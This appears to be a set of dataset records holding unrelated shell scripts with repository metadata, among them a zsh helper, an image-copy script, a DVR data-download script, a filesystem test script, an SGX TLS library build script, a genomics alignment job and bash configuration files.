chown -R $username:users /home/$username/{Downloads,Music,Pictures,Videos,Documents,time}
fi
echo "################################################################"
echo "################### T H E E N D ######################"
echo "################################################################"
exit
| true
|
013e48f07b735e1c7c3c0621d0559a0e823f26d3
|
Shell
|
crazy-matt/antigen
|
/src/helpers/interactive-mode.zsh
|
UTF-8
| 524
| 3.46875
| 3
|
[
"MIT"
] |
permissive
|
# This function checks ZSH_EVAL_CONTEXT to determine if we are running in an
# interactive shell.
#
# Usage
#    -antigen-interactive-mode
#
# Returns
#    The function's exit status: true (0) when interactive, false otherwise.
-antigen-interactive-mode () {
  WARN "-antigen-interactive-mode: $ZSH_EVAL_CONTEXT \$_ANTIGEN_INTERACTIVE = $_ANTIGEN_INTERACTIVE"
  # An explicit override wins: when _ANTIGEN_INTERACTIVE is set (non-empty),
  # report interactive only if it is exactly "true". The bare [[ ]] sets the
  # status that the plain `return` then propagates to the caller.
  if [[ $_ANTIGEN_INTERACTIVE != "" ]]; then
    [[ $_ANTIGEN_INTERACTIVE == true ]];
    return
  fi
  # Otherwise infer from zsh's evaluation context; the final [[ ]] is the
  # function's return status (no explicit return needed).
  [[ "$ZSH_EVAL_CONTEXT" == toplevel* || "$ZSH_EVAL_CONTEXT" == cmdarg* ]];
}
| true
|
0ebee4534cfa83ff7e285ef59da751abe2df1da4
|
Shell
|
bkrauzova/scripts
|
/copy_im.sh
|
UTF-8
| 737
| 4.125
| 4
|
[] |
no_license
|
#!/bin/sh
set -e -x
###################################################
# copy images from several subfolder to one folder
###################################################

# Print usage and exit with an error status.
usage ()
{
    echo "use:"
    echo "./copy_im <src> <dest>"
    echo ""
    exit 1
}

# Both positional arguments are required.
if [ -z "$2" ]; then
    usage
fi

# Resolve both directories relative to the current working directory.
SRC=`pwd`/$1
DES=`pwd`/$2

if [ ! -d "$DES" ] || [ ! -d "$SRC" ]; then
    echo "destination does not exist"
    exit 1;
fi

# BUG FIX: the list used to be "jpg, JPG, jpeg, JPEG" — the commas were part
# of each word, so find searched for "*.jpg," etc. and never matched a file.
for ext in jpg JPG jpeg JPEG
do
    echo "$ext"
    # BUG FIX: find prints paths already rooted at $SRC (an absolute path),
    # so the old "cp $SRC/$i" doubled the prefix and always failed.
    # The read-based loop also survives filenames containing spaces.
    find "$SRC" -name "*.${ext}" | while read -r i
    do
        cp -n "$i" "$DES"
        echo "copying $i to $DES ...\n"
    done
done

if [ -d "$DES" ]; then
    # BUG FIX: the count used the undefined variable $DEST; it is $DES.
    NUM=`ls "$DES" | wc -l`
    echo "----------------------------------------------"
    echo "$NUM files copied\n"
fi
exit 0
| true
|
d6301faf0adb1860731b8341a185cd0095692951
|
Shell
|
dennis-tmeinc/dvr
|
/dvr602/deploy/MDVR5100/host/dvr/tab102.sh
|
UTF-8
| 4,292
| 3.28125
| 3
|
[] |
no_license
|
#!/bin/sh
PATH=/bin:/davinci:/davinci/dvr
export PATH
# Shut down the USB wifi/serial stack so it cannot interfere with the
# TAB102 transfer over USB/UART:
#   - kill the DHCP client if its pidfile exists,
#   - bring the rausb0 (rt73 wifi) interface down,
#   - unload the rt73 wifi and mos7840/usbserial serial drivers.
# NOTE(review): the rmmod calls are unchecked best-effort — the modules may
# not be loaded at this point; that appears intentional.
remove_usbdrivers()
{
[ -f /var/dvr/udhcpc.pid ] && kill `cat /var/dvr/udhcpc.pid`
ifconfig rausb0 down
/bin/rmmod rt73
/bin/rmmod mos7840
/bin/rmmod usbserial
}
# let tab102(live) finish its job
# Flag-file handshake: raising /var/dvr/tab102check asks the already-running
# tab102 (live) process — identified by tab102.pid — to finish its download;
# we then poll until the flag disappears (presumably removed by the tab102
# process when done — TODO confirm against the tab102 sources).
if [ -f /var/dvr/tab102live -a -f /var/dvr/tab102.pid ]; then
echo 1 > /var/dvr/tab102check
# wait until the tab102 download is done
while [ -f /var/dvr/tab102check ]
do
sleep 1
done
# copy tab102 files
# /var/dvr/dvrcurdisk holds the mount point of the current recording disk;
# archive the g-force logs into its smartlog subdirectory.
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
fi
# do this only if tab102 was detected (on 510x)
#
# Branch overview — marker files under /var/dvr select the path:
#   tab102                    -> full TAB102 download sequence (this branch)
#   backupdisk + dvrsvr.pid   -> hybrid-disk (Flash -> Sata) copy handshake
#   multidisk  + dvrsvr.pid   -> multi-disk log-copy handshake
#   otherwise                 -> only archive the g-force logs
# Every path ends by raising the usewifi flag and loading rt73 for the
# smartftp upload stage.
# NOTE(review): the "echo 1 > flag; sleep 5; wait for flag+copyack" loops
# assume the dvrsvr daemon creates copyack and clears the flag when its
# copy job finishes — confirm against the dvrsvr sources.
if [ -f /var/dvr/tab102 ]
then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# insert module in case it was removed by file retrieval stick
insmod /davinci/usbserial.ko
/bin/insmod /davinci/mos7840.ko
# unmount every disk already mounted
# Each file under /var/dvr/xdisk/ names a mounted disk; unmount it and
# drop the bookkeeping file.
for f in /var/dvr/xdisk/*
do
umount `cat $f`
rm -f $f ;
done
# download tab102 data
/davinci/dvr/tab102
# we don't need usb/uart anymore
/bin/rmmod mos7840
/bin/rmmod usbserial
# mount disks again
/davinci/dvr/tdevmount /davinci/dvr/tdevhotplug
if [ -f /var/dvr/dvrcurdisk ]; then
# copy tab102 files
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
# Hybrid disk?
if [ -f /var/dvr/backupdisk -a -f /var/dvr/dvrsvr.pid ]; then
# ask dvrsvr to copy files for Hybrid disk
echo 1 > /var/dvr/hybridcopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/hybridcopy -a -f /var/dvr/copyack ]
do
sleep 1
done
# Multiple disk?
elif [ -f /var/dvr/multidisk -a -f /var/dvr/dvrsvr.pid ]; then
# ask dvrsvr to copy log files
echo 1 > /var/dvr/multicopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/multicopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
elif [ -f /var/dvr/backupdisk -a -f /var/dvr/dvrsvr.pid ]; then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# copy files for Hybrid disk (Flash --> Sata)
if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
# ask dvrsvr to copy files for Hybrid disk
echo 1 > /var/dvr/hybridcopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/hybridcopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # use wifi even on 602
/bin/insmod /davinci/rt73.ko
elif [ -f /var/dvr/multidisk -a -f /var/dvr/dvrsvr.pid ]; then
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
# ask dvrsvr to copy log files
if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
echo 1 > /var/dvr/multicopy
# give 5 sec for dvrsvr to create the copyack file
sleep 5
# wait until the job is done
while [ -f /var/dvr/multicopy -a -f /var/dvr/copyack ]
do
sleep 1
done
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
else
# shut down wifi/serial to avoid usb/uart problems
remove_usbdrivers
if [ -f /var/dvr/dvrcurdisk ]; then
# copy gforce files (if exist)
smartdir=`cat /var/dvr/dvrcurdisk`/smartlog
mkdir -p $smartdir && /davinci/dvr/gforce.sh $smartdir
fi
# insert rt73 for smartftp
echo 1 > /var/dvr/usewifi # useless on 510x
/bin/insmod /davinci/rt73.ko
fi
sleep 1
| true
|
154c14a7c96f9133037ff1b0f951d76b67e85bd3
|
Shell
|
Cloudxtreme/dropboxfs
|
/test.sh
|
UTF-8
| 1,967
| 3.75
| 4
|
[
"MIT"
] |
permissive
|
#!/bin/bash
# To run this, make sure you have dropboxfs already running.
MOUNTPOINT=test
echo "Runnning tests"
cd $MOUNTPOINT
# Compare a command's output against an expected string.
#   $1   - test name
#   $2   - expected output
#   $3.. - actual output (typically captured words of $(cmd))
# Word-splitting on both sides is intentional: it normalizes any run of
# whitespace (including newlines from $(ls)) to single spaces, so only
# content differences are reported.
# Prints "PASSED <name>" / "FAILED <name>"; exits non-zero on failure.
function Run_Test() {
    NAME=$1
    EXPECTED=$2
    shift 2
    COMMAND=$@
    # shellcheck disable=SC2086 -- unquoted on purpose (whitespace normalization)
    WANT=$(echo $EXPECTED)
    GOT=$(echo $COMMAND)
    if [ "$WANT" = "$GOT" ]; then
        echo "PASSED $NAME"
    else
        echo "FAILED $NAME"
        echo "Expected: $WANT"
        echo "Actual:   $GOT"
        # BUG FIX: a bare 'exit' here returned the status of the preceding
        # echo (0), so a failing test run still exited successfully.
        exit 1
    fi
}
Run_Test "mkdir test dir" "" $(mkdir testing)
echo 'cd into test dir'
cd testing
Run_Test "empty ls on new dir" "" $(ls)
echo 'this is a test' > test.txt
Run_Test "add new file" "test.txt" $(ls)
Run_Test "cat new file" "this is a test" $(cat test.txt)
Run_Test "cp file" "test.txt -> ./test-copied.txt" $(cp -v test.txt ./test-copied.txt)
Run_Test "ls files" "test-copied.txt test.txt" $(ls)
Run_Test "mv file" "test-copied.txt -> ./test-moved.txt" $(mv -v test-copied.txt ./test-moved.txt)
Run_Test "ls files" "test-moved.txt test.txt" $(ls)
Run_Test "cat moved & copied file" "this is a test" $(cat test-moved.txt)
Run_Test "cat original file" "this is a test" $(cat test.txt)
Run_Test "rm 1/2 files" "test-moved.txt" $(rm -v test-moved.txt)
Run_Test "mkdir subdir" "" $(mkdir subdir)
echo 'cd into subdir'
cd subdir
Run_Test "cp file down a level" "../test.txt -> ./sub.txt" $(cp -v ../test.txt ./sub.txt)
Run_Test "ls subdir files" "sub.txt" $(ls)
Run_Test "cat copied subdir file" "this is a test" $(cat sub.txt)
Run_Test "mv file up a level" "sub.txt -> ../super.txt" $(mv -v sub.txt ../super.txt)
Run_Test "cat moved subdir file" "this is a test" $(cat ../super.txt)
echo 'cd back up to test dir'
cd ../
Run_Test "rmdir subdir" "" $(rmdir subdir)
Run_Test "rm moved file" "super.txt" $(rm -v super.txt)
Run_Test "ls one file" "test.txt" $(ls)
Run_Test "rm last file" "test.txt" $(rm -v test.txt)
Run_Test "ls no files" "" $(ls)
echo 'cd back up to root'
cd ../
Run_Test "rmdir testing" "" $(rmdir testing)
echo "All tests passed"
| true
|
25fbe945082948f40697ba71c799919aeb088b03
|
Shell
|
bergquist/dotfiles
|
/.bash_profile
|
UTF-8
| 1,707
| 3.109375
| 3
|
[] |
no_license
|
#!/usr/bin/env bash
DOTFILES=~/.dotfiles
export EDITOR="/usr/bin/vim"
export GIT_EDITOR='/usr/bin/vim'
unset MAILCHECK # Don't check mail when opening terminal.
alias reload='source ~/.bash_profile'
source "${DOTFILES}/prompt/colors.theme.bash"
source "${DOTFILES}/prompt/base.theme.bash"
source "${DOTFILES}/prompt/sexy.theme.bash"
source "${DOTFILES}/system/aliases.bash"
source "${DOTFILES}/system/config.bash"
source "${DOTFILES}/system/docker.bash"
source "${DOTFILES}/system/golang.bash"
source "${DOTFILES}/system/google-cloud.bash"
source "${DOTFILES}/system/path.bash"
source "${DOTFILES}/system/python.bash"
# Autocorrect typos in path names when using `cd`
shopt -s cdspell
# Case-insensitive globbing (used in pathname expansion)
shopt -s nocaseglob
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\w\$ '
#setxkbmap -option caps:ctrl_modifier
#setxkbmap -option ctrl:nocaps
# Pretty-print and syntax-highlight JSON.
# Usage: `json '{"foo":42}'` or `echo '{"foo":42}' | json`
json() {
	if [ -t 0 ]; then
		# stdin is a terminal, so the JSON was passed as arguments
		printf '%s\n' "$*" | python -mjson.tool | pygmentize -l javascript
	else
		# stdin is a pipe/redirect: stream it through
		python -mjson.tool | pygmentize -l javascript
	fi
}
# include timestamp in bash history
# (HISTTIMEFORMAT is consumed by the shell itself; no export needed)
HISTTIMEFORMAT="%F %T "
# Load nvm only if it is actually installed (-s: file exists and is
# non-empty); "\." bypasses any alias defined on "." .
export NVM_DIR="$HOME/.nvm"
[ -s "$NVM_DIR/nvm.sh" ] && \. "$NVM_DIR/nvm.sh" # This loads nvm
[ -s "$NVM_DIR/bash_completion" ] && \. "$NVM_DIR/bash_completion" # This loads nvm bash_completion
# enable bash completion in interactive shells
#if ! shopt -oq posix; then
# if [ -f /usr/share/bash-completion/bash_completion ]; then
# . /usr/share/bash-completion/bash_completion
# elif [ -f /etc/bash_completion ]; then
# . /etc/bash_completion
# fi
#fi
# NOTE(review): this fails noisily if ~/.bash_secret does not exist;
# consider guarding it with a [ -f ... ] test like the nvm lines above.
source ~/.bash_secret
| true
|
f775092f8dbf88ce321a1b8e9c416c57fbf1565f
|
Shell
|
fridolin1995/FORGEON_X
|
/samba_all_version/sync_sbin_bin.sh
|
UTF-8
| 124
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/bash
# Dry run: for every "sbin" directory under the current tree, print the cp
# command that would mirror its contents into the sibling "bin" directory.
# (The leading 'echo' is preserved from the original; drop it to really copy.)
find "$(pwd)" -type d -name sbin | while read -r each
do
    # BUG FIX: the old `sed 's/sbin/bin/g'` rewrote *every* occurrence of
    # "sbin" in the path (e.g. /opt/sbin-tools/sbin -> /opt/bin-tools/bin).
    # Since find -name sbin guarantees the path ends in "sbin", strip just
    # that final component instead. The read loop (vs. `for x in $(find)`)
    # also keeps paths containing spaces intact.
    echo cp "$each"/* "${each%sbin}bin"
done
| true
|
e31c8bd5da46cbf1a4903d7401d4f145a8932f13
|
Shell
|
epam/fonda
|
/src/integrationTest/resources/templates/dnaAmpliconVarFastq/testPairedXenomeYesSeqpurgeNovoalign/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.txt
|
UTF-8
| 3,735
| 3
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash -x
# --- SGE options --- #
#$ -V
#$ -wd build/resources/integrationTest/output
#$ -N DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis
#$ -o build/resources/integrationTest/output/log_files/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.log
#$ -e build/resources/integrationTest/output/err_files/DnaAmpliconVar_Fastq_alignment_for_GA5_1_analysis.err
#$ -q main.q
#$ -R y
#$ -pe threaded 4
#$ -m a
# --- The commands to be executed --- #
cd build/resources/integrationTest/output
echo `date` Begin the job execution...
echo `date` Begin Step: Xenome classification...
/usr/bin/xenome classify -T 8 -P /ngs/data/xenomeIdx/xenome.idx --pairs --graft-name human --host-name mouse --output-filename-prefix build/resources/integrationTest/output/GA5/tmp/GA5_1 --tmp-dir build/resources/integrationTest/output/GA5/tmp -i /ngs/data/demo/test/fastq_data/GA5_0001_L002_R1_001.fastq.gz -i /ngs/data/demo/test/fastq_data/GA5_0001_L002_R2_001.fastq.gz
awk '{if (NR % 4 == 1) print "@"$0; else if (NR % 4 == 3) print "+"$0; else print $0 }' build/resources/integrationTest/output/GA5/tmp/GA5_1_human_1.fastq > build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_1.fastq
awk '{if (NR % 4 == 1) print "@"$0; else if (NR % 4 == 3) print "+"$0; else print $0 }' build/resources/integrationTest/output/GA5/tmp/GA5_1_human_2.fastq > build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_2.fastq
cat build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_1.fastq | gzip -c > build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R1.fq.gz
cat build/resources/integrationTest/output/GA5/tmp/GA5_1_convert_human_2.fastq | gzip -c > build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R2.fq.gz
if [ $? -eq 0 ]
then
echo `date` Successful Step: Xenome classification.
sleep 8
else
echo `date` Error Step: Xenome classification.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Seqpurge trimming...
/opt/ngs_bits/ngs-bits/bin/SeqPurge -threads 4 -in1 build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R1.fq.gz -in2 build/resources/integrationTest/output/GA5/fastq/GA5_1_classified_R2.fq.gz -out1 build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R1.fastq.gz -out2 build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R2.fastq.gz -qcut 20 -a1 AGATCGGAAGAGCACACGTCTGAACTCCAGTCAC -a2 AGATCGGAAGAGCGTCGTGTAGGGAAAGAGTGTAGATCTCGGTGGTCGCCGTATCATT
if [ $? -eq 0 ]
then
echo `date` Successful Step: Seqpurge trimming.
sleep 8
else
echo `date` Error Step: Seqpurge trimming.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Novoalign alignment...
/usr/bin/novoalign -c 4 -d /ngs/data/novoindexDB/novoindex.nix -o SAM $'@RG\tID:GA5\tSM:GA5\tLB:GA5\tPL:Illumina' -f build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R1.fastq.gz build/resources/integrationTest/output/GA5/fastq/GA5_1.trimmed.R2.fastq.gz| /opt/samtools/samtools-0.1.19/samtools view -bS -|/opt/samtools/samtools-0.1.19/samtools sort - build/resources/integrationTest/output/GA5/bam/GA5_1.novoalign.sorted
if [ $? -eq 0 ]
then
echo `date` Successful Step: Novoalign alignment.
sleep 8
else
echo `date` Error Step: Novoalign alignment.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Begin Step: Index bam...
/opt/samtools/samtools-0.1.19/samtools index build/resources/integrationTest/output/GA5/bam/GA5_1.novoalign.sorted.bam
if [ $? -eq 0 ]
then
echo `date` Successful Step: Index bam.
sleep 8
else
echo `date` Error Step: Index bam.
echo `date` The job was aborted due to ERRORS found.
exit 1;
fi
echo `date` Finish the job execution!
| true
|
fd1d917f9ce68d28a099aafe39b0e21330ecb950
|
Shell
|
wangke0809/sgx-ra-tls
|
/build.sh
|
UTF-8
| 5,804
| 3.453125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
set -x
# Print the accepted build variants on stdout.
usage() {
    printf '%s\n' "./build.sh sgxsdk|graphene|scone|sgxlkl"
}
# You need the SGX SDK and PSW installed.
# Exactly one variant argument is required.
if [[ $# -gt 1 || $# -eq 0 ]]; then
echo "wrong number of arguments"
usage
exit 1
fi
[[ $# -eq 1 ]] && VARIANT=$1
if [[ ! ( $VARIANT == "scone" ||
$VARIANT == "graphene" ||
$VARIANT == "sgxsdk" ||
$VARIANT == "sgxlkl" ) ]] ; then
echo "unknown variant; must be one of sgxsdk, graphene, scone or sgxlkl."
usage
exit 1
fi
# All third-party sources are fetched and built under deps/; each clone is
# skipped when its directory already exists, so re-running is incremental.
mkdir -p deps
pushd deps
# The wolfSSL and mbedtls libraries are necessary for the non-SGX
# clients. We do not use their package versions since we need them to
# be compiled with specific flags.
if [ ! -d mbedtls ] ; then
git clone https://github.com/ARMmbed/mbedtls.git
pushd mbedtls
git checkout mbedtls-2.5.1
# Add -DCMAKE_BUILD_TYPE=Debug for Debug
# Local patches enlarge the certificate write buffer and adjust the
# server/client samples before building a PIC static library into ../local.
patch -p1 < ../../mbedtls-enlarge-cert-write-buffer.patch
patch -p1 < ../../mbedtls-ssl-server.patch
patch -p1 < ../../mbedtls-client.patch
cmake -DCMAKE_BUILD_TYPE=Debug -DENABLE_PROGRAMS=off -DCMAKE_C_FLAGS="-fPIC -DMBEDTLS_X509_ALLOW_UNSUPPORTED_CRITICAL_EXTENSION" . || exit 1
make -j`nproc` || exit 1
cmake -D CMAKE_INSTALL_PREFIX=$(readlink -f ../local) -P cmake_install.cmake || exit 1
popd
fi
if [ ! -d wolfssl ] ; then
git clone https://github.com/wolfSSL/wolfssl || exit 1
pushd wolfssl
# Pinned commit plus the local SGX remote-attestation patch.
git checkout 57e5648a5dd734d1c219d385705498ad12941dd0
patch -p1 < ../../wolfssl-sgx-attestation.patch || exit 1
[ ! -f ./configure ] && ./autogen.sh
# Add --enable-debug for debug build
# --enable-nginx: #define's WOLFSSL_ALWAYS_VERIFY_CB and
# KEEP_OUR_CERT. Without this there seems to be no way to access
# the certificate after the handshake.
#
# 2017-12-11: --enable-nginx also activates OPENSSLEXTRA. The later
# includes symbols that clash with OpenSSL, i.e., wolfSSL and OpenSSL
# cannot be linked into the same binary. --enable-opensslcoexists does
# not seem to help in this case.
WOLFSSL_CFLAGS="-fPIC -DWOLFSSL_SGX_ATTESTATION -DWOLFSSL_ALWAYS_VERIFY_CB -DKEEP_PEER_CERT"
CFLAGS="$WOLFSSL_CFLAGS" ./configure --prefix=$(readlink -f ../local) --enable-writedup --enable-static --enable-keygen --enable-certgen --enable-certext || exit 1 # --enable-debug
make -j`nproc` || exit 1
make install || exit 1
# Add -DDEBUG_WOLFSSL to CFLAGS for debug
# Also build the trusted (enclave-side) static wolfSSL library shipped in the
# wolfSSL SGX IDE directory and stage it next to the untrusted install.
pushd IDE/LINUX-SGX
make -f sgx_t_static.mk SGX_DEBUG=1 CFLAGS="-DUSER_TIME -DWOLFSSL_SGX_ATTESTATION -DWOLFSSL_KEY_GEN -DWOLFSSL_CERT_GEN -DWOLFSSL_CERT_EXT" || exit 1
cp libwolfssl.sgx.static.lib.a ../../../local/lib
popd
popd
fi
# curl is only needed for the variants that talk to IAS from the host side;
# SCONE and SGX-LKL bring their own.
if [[ ! -d curl && "$VARIANT" != "scone" && "$VARIANT" != "sgxlkl" ]] ; then
git clone https://github.com/curl/curl.git
pushd curl
git checkout curl-7_47_0
./buildconf
./configure --prefix=$(readlink -f ../local) --without-libidn --without-librtmp --without-libssh2 --without-libmetalink --without-libpsl --with-ssl # --enable-debug
make -j`nproc` || exit 1
make install || exit 1
popd
fi
# Linux SGX SDK code
if [[ ! -d linux-sgx ]] ; then
git clone https://github.com/01org/linux-sgx.git
pushd linux-sgx
git checkout sgx_2.0
popd
fi
# The out-of-tree SGX driver sources are only needed to build Graphene.
if [[ ! -d linux-sgx-driver && $VARIANT == "graphene" ]] ; then
git clone https://github.com/01org/linux-sgx-driver.git
pushd linux-sgx-driver
git checkout sgx_driver_2.0
popd
fi
if [[ ! -d graphene && $VARIANT == "graphene" ]] ; then
git clone --recursive https://github.com/oscarlab/graphene.git
pushd graphene
git checkout e01769337c38f67d7ccd7a7cadac4f9df0c6c65e
# Generate the (3072-bit, exponent-3) enclave signing key Graphene requires.
openssl genrsa -3 -out Pal/src/host/Linux-SGX/signer/enclave-key.pem 3072
# patch -p1 < ../../graphene-sgx-linux-driver-2.1.patch
# The Graphene build process requires two inputs: (i) SGX driver directory, (ii) driver version.
# Unfortunately, cannot use make -j`nproc` with Graphene's build process :(
printf "$(readlink -f ../linux-sgx-driver)\n2.0\n" | make SGX=1 || exit 1
# I prefer to have all dynamic libraries in one directory. This
# reduces the effort in the Graphene-SGX manifest file.
ln -s /usr/lib/x86_64-linux-gnu/libprotobuf-c.so.1 Runtime/
ln -s /usr/lib/libsgx_uae_service.so Runtime/
ln -s /lib/x86_64-linux-gnu/libcrypto.so.1.0.0 Runtime/
ln -s /lib/x86_64-linux-gnu/libz.so.1 Runtime/
ln -s /lib/x86_64-linux-gnu/libssl.so.1.0.0 Runtime/
popd
fi
popd # deps
# Copy client certificates required to talk to Intel's Attestation
# Service
# cp ../../certs/ias-client*.pem .
if [ $VARIANT == "sgxsdk" ] ; then
echo "Building wolfSSL SGX library ..."
make -f ratls-wolfssl.mk || exit 1
make -f ratls-wolfssl.mk clean || exit 1
fi
pushd deps
if [[ ! -d wolfssl-examples ]] ; then
echo "Building SGX-SDK-based wolfSSL sample server (HTTPS) ..."
git clone https://github.com/wolfSSL/wolfssl-examples.git || exit 1
pushd wolfssl-examples
git checkout 94b94262b45d264a40d484060cee595b26bdbfd7
patch -p1 < ../../wolfssl-examples.patch || exit 1
# Copy certificates required to talk to Intel Attestation Service
ln -s ../../../ias-client-key.pem SGX_Linux/ias-client-key.pem
ln -s ../../../ias-client-cert.pem SGX_Linux/ias-client-cert.pem
popd
fi
popd
echo "Building non-SGX-SDK sample clients ..."
make clients || exit 1
# NOTE: 'exit' without a status re-uses the failing make's exit code here.
make clean || exit
# Variant-specific server builds; the trailing targets intentionally run last.
if [ $VARIANT == "scone" ] ; then
bash ./build-SCONE.sh || exit 1
make scone-server || exit 1
fi
if [ $VARIANT == "sgxlkl" ] ; then
make -C sgxlkl -j2 || exit 1
fi
if [ $VARIANT == "sgxsdk" ] ; then
make sgxsdk-server
fi
if [ $VARIANT == "graphene" ] ; then
make graphene-server
make wolfssl-client-mutual
fi
| true
|
d7be9a23071e5f5af52e5852d4a51cbee330e755
|
Shell
|
vklyukin/team3_testing_system
|
/auto_bootstrap.sh
|
UTF-8
| 2,905
| 3.390625
| 3
|
[] |
no_license
|
#!/usr/bin/env sh
# Interactive bootstrap for the testing-system stack: collects superuser
# credentials via whiptail dialogs, writes the chosen BASE_PATH into the
# frontend/backend config files, then builds and initialises the
# docker-compose services (migrations, admin user, static files).
#
# NOTE(review): the script aborts with 'return 1', which only works when it is
# sourced ('. auto_bootstrap.sh'); when executed directly 'return' is an error
# in most shells — confirm the intended invocation before changing it.
superuser_name=$(whiptail --title "Create superuser" --inputbox "Input superuser name" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_name" ] && echo "Operation aborted by user" && return 1
superuser_mail=$(whiptail --title "Create superuser" --inputbox "Input superuser mail" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_mail" ] && echo "Operation aborted by user" && return 1
superuser_password=$(whiptail --title "Create superuser" --passwordbox "Input superuser password" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$superuser_password" ] && echo "Operation aborted by user" && return 1
password_repeat=$(whiptail --title "Create superuser" --passwordbox "Confirm superuser password" 10 60 3>&1 1>&2 2>&3)
[ $? -ne 0 ] || [ -z "$password_repeat" ] && echo "Operation aborted by user" && return 1
[ "$superuser_password" != "$password_repeat" ] && echo "Passwords mismatch" && return 1
start_on_complete=false
whiptail --title "Configure" --yesno "Do you want to run server after configuration complete?" 10 60
[ $? -eq 0 ] && start_on_complete=true
base_path=$(whiptail --title "Configure" --menu "Choose base_path" 15 60 4 \
"1" "http://localhost:5000/" \
"2" "http://cs.entryhse.tk/" 3>&1 1>&2 2>&3)
[ $? -ne 0 ] && echo "Operation aborted by user" && return 1
# Write the selected base path into both the JS and the Python config,
# keeping the other alternative as a comment.
case "$base_path" in
"1")
printf "// const BASE_PATH = 'http://cs.entryhse.tk/';\nconst BASE_PATH = 'http://localhost:5000/';" > ./test_system/static/js/base_path.js
printf "# BASE_PATH = 'http://cs.entryhse.tk/'\nBASE_PATH = 'http://localhost:5000/'" > test_system/test_system/base_path.py
;;
"2")
printf "const BASE_PATH = 'http://cs.entryhse.tk/';\n// const BASE_PATH = 'http://localhost:5000/';" > ./test_system/static/js/base_path.js
printf "BASE_PATH = 'http://cs.entryhse.tk/'\n# BASE_PATH = 'http://localhost:5000/'" > test_system/test_system/base_path.py
;;
*)
echo "Operation aborted by user" && return 1
;;
esac
# BUG FIX: the original format string read "...\nsuperuser_mail\n..." (missing
# '$'), so the literal text "superuser_mail" was written instead of the
# address and 'initadmin' received a bogus e-mail.  The values are now passed
# as printf *arguments*, so '%' or '\' characters in a password can no longer
# be misinterpreted as format directives.
printf '%s\n%s\n%s' "$superuser_name" "$superuser_mail" "$superuser_password" > .superuser.txt
docker-compose build
# Temporarily comment STATIC_ROOT out so manage.py commands run before
# collectstatic; it is restored further down.
sed -i'.original' -e 's/^STATIC_ROOT/# STATIC_ROOT/' ./test_system/test_system/settings.py
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py makemigrations"
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py migrate"
docker-compose run --rm djangoapp /bin/bash -c "cat .superuser.txt | python3 test_system/manage.py initadmin"
docker-compose run --rm djangoapp /bin/bash -c "python3 test_system/manage.py initscale"
sed -i'.original' -e 's/^# STATIC_ROOT/STATIC_ROOT/' ./test_system/test_system/settings.py
rm ./test_system/test_system/settings.py.original
docker-compose run djangoapp python3 test_system/manage.py collectstatic --no-input
docker-compose run --rm djangoapp /bin/bash -c "cp -r ./test_system/static/* ../static"
[ "$start_on_complete" = true ] && docker-compose up
| true
|
7182b18b131783cdd087ad5819f98fe119b30935
|
Shell
|
pappagari/config_files
|
/bash_rc
|
UTF-8
| 3,545
| 3.421875
| 3
|
[] |
no_license
|
# set a fancy prompt (non-color, unless we know we "want" color)
case "$TERM" in
xterm-color)
PS1='${debian_chroot:+($debian_chroot)}\[\033[01;32m\]\u@\h\[\033[00m\]:\[\033[01;34m\]\W\[\033[00m\]\$ '
;;
*)
PS1='${debian_chroot:+($debian_chroot)}\u@\h:\W\$ '
;;
esac
# enable color support of ls and also add handy aliases
# NOTE(review): several aliases below are defined twice ('io' here and again a
# few lines down); the later definition wins.  This whole block is also partly
# duplicated by the dircolors block further below.
if [ "$TERM" != "dumb" ]; then
eval "`dircolors -b`"
alias ls='ls --color=auto'
#alias dir='ls --color=auto --format=vertical'
alias u='du -hs'
alias f='df -h'
alias a='ls -ltr'
alias p='readlink -f'
